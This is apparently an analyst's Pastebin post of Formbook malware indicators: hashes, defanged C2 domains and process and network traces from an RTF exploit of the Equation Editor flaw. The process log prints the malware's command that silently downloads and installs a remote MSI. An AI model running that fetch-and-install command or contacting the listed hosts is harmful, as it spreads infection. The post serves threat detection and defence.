SHARE
TWEET

#formbook_070519

VRad May 8th, 2019 (edited) 296 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #formbook #RTF11882 #exe2msi #opendir
  2.  
  3. https://pastebin.com/H2mkW82S
  4.  
  5. previous_contact:
  6. 22/04/19    https://pastebin.com/1FMBBK3N
  7. 26/02/19    https://pastebin.com/yLu1cL9K
  8. 15/11/18    https://pastebin.com/VFG89LnT
  9. 14/11/18    https://pastebin.com/D6VPDyyz
  10.  
  11. FAQ:
  12. http://www.exetomsi.com/freeware
  13.  
  14. attack_vector
  15. --------------
  16. email attach .doc (RTF) > 11882 > msiexec GET msi > install (broken)
  17.  
  18. email_headers
  19. --------------
  20. n/a
  21.  
  22. files
  23. --------------
  24. SHA-256     167441aa99bbbe621a775528f8c20724c6091e65d80fdf700389f0c9af41ead7
  25. File name   PO-20190507.doc             [RTF]
  26. File size   311.08 KB (318542 bytes)
  27.  
  28. SHA-256     1c9fe57b3adaa58d86bcc8f683d6496c1ce40ee468434d768543910e8442f999
  29. File name   1.msi                       [MSI Installer, Exe to msi converter free]
  30. File size   556 KB (569344 bytes)
  31.  
  32. SHA-256     f6c6bed0e6a223f26de874256e0ce8443a6203634aa2d2871c0cbec73adcb397
  33. File name   MSID06.tmp                  [PE32 executable (GUI) Intel 80386, for MS Windows]
  34. File size   530.5 KB (543232 bytes)
  35.  
  36. activity
  37. **************
  38. PL_SCR  h11p:\ joeing2{.} duckdns{.} org/joe/1.msi
  39.  
  40. C2  h11p:\kvkhbw{.} com/jo/
  41.     h11p:\7hprd{.} com/jo/
  42.     h11p:\.atlanticpressftp{.} com/jo/
  43.     h11p:\mohammadarif.info/jo/
  44.     h11p:\tdoog{.} com/jo/
  45.     h11p:\macounty{.} com/jo/
  46.     h11p:\aufdemweg.one/jo/
  47.     h11p:\interactivenetworksystems{.} com/jo/
  48.  
  49. cmd.exe & /C CD C: & msiexec.exe /i h11p:\ joeing2{.} duckdns{.} org/joe/1.msi /quiet
  50.  
  51. Error 1722. There is a problem with this Windows Installer package.
  52. A program run as part of the setup did not finish as expected.
  53. Contact your support personnel or package vendor.
  54. Action _B3D13F97_1369_417D_A477_B4C42B829328, location: C:\Windows\Installer\MSI49E9.tmp, command: /S
  55. === Logging stopped: ??.??.2019  11:24:24 ===
  56.  
  57. netwrk
  58. --------------
  59. 23.249.162.144  joeing2{.} duckdns{.} org   GET /joe/1.msi HTTP/1.1     Windows Installer
  60.  
  61. comp
  62. --------------
  63. msiexec.exe 3096    TCP localhost   50104   23.249.162.144  80  ESTABLISHED
  64.  
  65. proc
  66. --------------
  67. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  68. ... [not children, another context]
  69. "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  70. ... [not children, another context]
  71. C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://joeing2{.} duckdns{.} org/joe/1.msi /quiet
  72. C:\Windows\SysWOW64\msiexec.exe /i http://joeing2{.} duckdns{.} org/joe/1.msi /quiet
  73. ... [not children, another context]
  74. C:\Windows\system32\msiexec.exe
  75. "C:\Windows\Installer\MSI49E9.tmp" /S
  76.  
  77. persist
  78. --------------
  79. n/a
  80.  
  81. drop
  82. --------------
  83. C:\Windows\Installer\MSI49E9.tmp
  84. %temp%\MSI6769f.LOG
  85.  
  86. # # #
  87. https://www.virustotal.com/gui/file/167441aa99bbbe621a775528f8c20724c6091e65d80fdf700389f0c9af41ead7/details
  88. https://www.virustotal.com/gui/file/1c9fe57b3adaa58d86bcc8f683d6496c1ce40ee468434d768543910e8442f999/details
  89. https://www.virustotal.com/gui/file/f6c6bed0e6a223f26de874256e0ce8443a6203634aa2d2871c0cbec73adcb397/details
  90. https://analyze.intezer.com/#/analyses/33fac682-f65f-4ecd-82c5-1abf759a07a7
  91. https://analyze.intezer.com/#/analyses/5b072d73-73f0-404a-ac75-3141ed972a9e
  92. https://www.virustotal.com/gui/file/e22634d0f10eb26fe0503478c8027a0eabe734006e664014ada5e09a58097e91/details
  93. https://analyze.intezer.com/#/analyses/2aaf18fe-3d54-4ca9-a002-32cad1f3f985
  94.  
  95. VR
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top